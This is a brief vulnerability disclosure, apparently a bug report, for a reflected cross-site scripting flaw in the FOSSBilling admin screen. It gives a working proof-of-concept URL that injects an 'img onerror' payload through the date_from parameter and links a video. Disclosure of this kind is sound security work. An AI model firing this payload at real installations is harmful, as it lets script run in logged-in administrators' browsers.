There is a reflective XSS on the FOSSBilling admin screen.
By accessing the following URL, it is possible to execute any script on the browser of the logged-in administrator user.
URL: https://localhost/admin?_url=%2Fadmin&date_to=2023-07-08&date_from=%27%22%3E%3Cimg%20src=x%20onerror=alert(3)%3E
'"><img src>
date_to
date_from
https://drive.google.com/file/d/1Zha4cWz-dBM8PWpmLvQUU2zHn2g_6PME/view?usp=sharing